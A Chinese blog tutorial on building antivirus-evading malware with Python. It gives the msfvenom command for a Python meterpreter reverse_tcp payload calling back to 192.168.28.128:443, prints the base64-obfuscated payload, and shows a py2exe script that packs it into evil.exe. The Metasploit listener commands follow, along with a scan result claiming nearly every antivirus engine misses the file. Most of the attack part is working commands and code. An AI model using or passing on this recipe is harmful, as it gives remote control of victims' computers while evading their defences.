首页
所有分类
TAGS
文字工具 EMOJI BIBLE
编程 Python

使用Python进行防病毒免杀解析

Posted in Python onDecember 13, 2019

很多渗透工具都提供了权限维持的能力,如Metasploit、Empire和Cobalt Strike,但是都会被防病毒软件检测到这种恶意行为。在探讨一个权限维持技巧的时候,似乎越来越多的人关注的是,这个方式会不会被被杀软杀掉?

打造免杀的payload成了一个很重要的话题,在这里,本文将介绍如何使用Pyhton轻松绕过防病毒软件。

0x01 环境准备

1、软件安装

Python 2.7.16 x86:https://www.python.org/ftp/python/2.7.16/python-2.7.16.msi
Py2exe 32位:https://sourceforge.net/projects/py2exe/files/py2exe/0.6.9/py2exe-0.6.9.win32-py2.7.exe/download

2、msfvenom生成Python Payload

msfvenom -p python/meterpreter/reverse_tcp LHOST=192.168.28.128 LPORT=443 -f raw -o /var/www/html/evil.py

使用Python进行防病毒免杀解析

evil.py 代码如下:

import base64,sys;exec(base64.b64decode({2:str,3:lambda b:bytes(b,'UTF-8')}[sys.version_info[0]]('aW1wb3J0IHNvY2tldCxzdHJ1Y3QsdGltZQpmb3IgeCBpbiByYW5nZSgxMCk6Cgl0cnk6CgkJcz1zb2NrZXQuc29ja2V0KDIsc29ja2V0LlNPQ0tfU1RSRUFNKQoJCXMuY29ubmVjdCgoJzE5Mi4xNjguMjguMTI4Jyw0NDMpKQoJCWJyZWFrCglleGNlcHQ6CgkJdGltZS5zbGVlcCg1KQpsPXN0cnVjdC51bnBhY2soJz5JJyxzLnJlY3YoNCkpWzBdCmQ9cy5yZWN2KGwpCndoaWxlIGxlbihkKTxsOgoJZCs9cy5yZWN2KGwtbGVuKGQpKQpleGVjKGQseydzJzpzfSkK')))

0x02 py2exe 打包Python程序

将evil.py复制到windows,同时创建一个setup.py文件:

from distutils.core import setup
import py2exe
setup(
name = 'Meter',
description = 'Python-based App',
version = '1.0',
console=['evil.py'],
options = {'py2exe': {'bundle_files': 1,'packages':'ctypes','includes': 'base64,sys,socket,struct,time,code,platform,getpass,shutil',}},
zipfile = None,
)

下面的方法运行 evil.py,生成可执行文件。

python ./setup.py py2exe

使用Python进行防病毒免杀解析

0x03 设置监听端口

Kali 运行Metasploit,设置监听:

msfconsole
use exploit/multi/handler
set PAYLOAD python/meterpreter/reverse_tcp
set LHOST 192.168.28.128
set LPORT 443
run

在Windows中运行evil.exe,获得一个meterpreter的会话

使用Python进行防病毒免杀解析

0x04 免杀验证

确认生成的exe文件可正常工作,接下来对evil.exe进行在线病毒扫描,以确认免杀效果如何。
这里我们使用VirSCAN.org-多引擎在线病毒扫描网 v1.02,当前支持 47 款杀毒引擎

使用Python进行防病毒免杀解析

扫描结果:47款杀毒引擎中,只有一个引擎报毒,主流的杀毒软件全部绕过。

网站地址: http://www.virscan.org 

参考文章:

https://medium.com/bugbountywriteup/antivirus-evasion-with-python-49185295caf1

总结

以上所述是小编给大家介绍的使用Python进行防病毒免杀,希望对大家有所帮助,如果大家有任何疑问请给我留言,小编会及时回复大家的。在此也非常感谢大家对三水点靠木网站的支持!
如果你觉得本文对你有帮助,欢迎转载,烦请注明出处,谢谢!

使用Python进行防病毒免杀解析

- Author -

Bypass

声明:登载此文出于传递更多信息之目的,并不意味着赞同其观点或证实其描述。

Python 相关文章推荐
go语言计算两个时间的时间差方法
Mar 13 Python
Python中的两个内置模块介绍
Apr 05 Python
使用beaker让Facebook的Bottle框架支持session功能
Apr 23 Python
python实现字符串和日期相互转换的方法
May 13 Python
python中文编码与json中文输出问题详解
Aug 24 Python
Python面向对象之继承和组合用法实例分析
Aug 27 Python
Python常见的pandas用法demo示例
Mar 16 Python
python 的 scapy库,实现网卡收发包的例子
Jul 23 Python
解决keras backend 越跑越慢问题
Jun 18 Python
从python读取sql的实例方法
Jul 21 Python
Python爬取微信小程序通用方法代码实例详解
Sep 29 Python
解决python3输入的坑——input()
Dec 05 Python
python 使用shutil复制图片的例子
Dec 13 #Python
基于python traceback实现异常的获取与处理
Dec 13 #Python
python 实现批量替换文本中的某部分内容
Dec 13 #Python
django多种支付、并发订单处理实例代码
Dec 13 #Python
Python+OpenCV+图片旋转并用原底色填充新四角的例子
Dec 12 #Python
Python+OpenCV 实现图片无损旋转90°且无黑边
Dec 12 #Python
使用python去除图片白色像素的实例
Dec 12 #Python
compose(3) FuzzyWuzzy(1) opencv(7) Athens(1) Pyecharts(7) iOS15(1) moviepy(1) 模糊匹配(1) iOS16(1) iOS(1)
You might like
php中的一些数组排序方法分享
2012/07/20 PHP
浅谈PHP中Stream(流)
2015/06/08 PHP
PHP常用函数之base64图片上传功能详解
2019/10/21 PHP
关于PHP中interface的用处详解
2020/07/26 PHP
实现超用户体验 table排序javascript实现代码
2009/06/22 Javascript
使用闭包对setTimeout进行简单封装避免出错
2013/07/10 Javascript
jquery得到iframe src属性值的方法
2014/09/25 Javascript
JQuery实现鼠标移动图片显示描述层的方法
2015/06/25 Javascript
jQuery购物网页经典制作案例
2016/08/19 Javascript
微信小程序 火车票查询实例讲解
2016/10/17 Javascript
JavaScript中最常见的三个面试题解析
2017/03/04 Javascript
JavaScript实现图片切换效果
2017/08/12 Javascript
Node.js实现发送邮件功能
2017/11/06 Javascript
Vue项目查看当前使用的elementUI版本的方法
2018/09/27 Javascript
vue组件数据传递、父子组件数据获取,slot,router路由功能示例
2019/03/19 Javascript
Vue 幸运大转盘实现思路详解
2019/05/06 Javascript
茶余饭后聊聊Vue3.0响应式数据那些事儿
2019/10/30 Javascript
JQuery插件tablesorter表格排序实现过程解析
2020/05/28 jQuery
基于javascript处理nginx请求过程详解
2020/07/07 Javascript
[01:20]DOTA2 2017国际邀请赛冠军之路无止竞
2017/06/19 DOTA
[52:31]VP vs Serenity 2018国际邀请赛小组赛BO2 第二场 8.16
2018/08/17 DOTA
python列表与元组详解实例
2013/11/01 Python
Python、Javascript中的闭包比较
2015/02/04 Python
Window10+Python3.5安装opencv的教程推荐
2018/04/02 Python
Python3实现定时任务的四种方式
2019/06/03 Python
Python 类的私有属性和私有方法实例分析
2019/09/29 Python
call在Python中改进数列的实例讲解
2020/12/09 Python
意大利会呼吸的鞋:Geox健乐士
2017/02/12 全球购物
美国流行背包品牌:JanSport(杰斯伯)
2018/03/02 全球购物
TALLY WEiJL法国网上商店:服装、时装及配饰
2019/08/31 全球购物
理工大学毕业生自荐信
2013/11/01 职场文书
自荐信需注意事项
2014/01/25 职场文书
大一学生职业生涯规划
2014/03/11 职场文书
爱心倡议书范文
2014/05/12 职场文书
2014年化验员工作总结
2014/11/18 职场文书
2015年大学班主任工作总结
2015/04/30 职场文书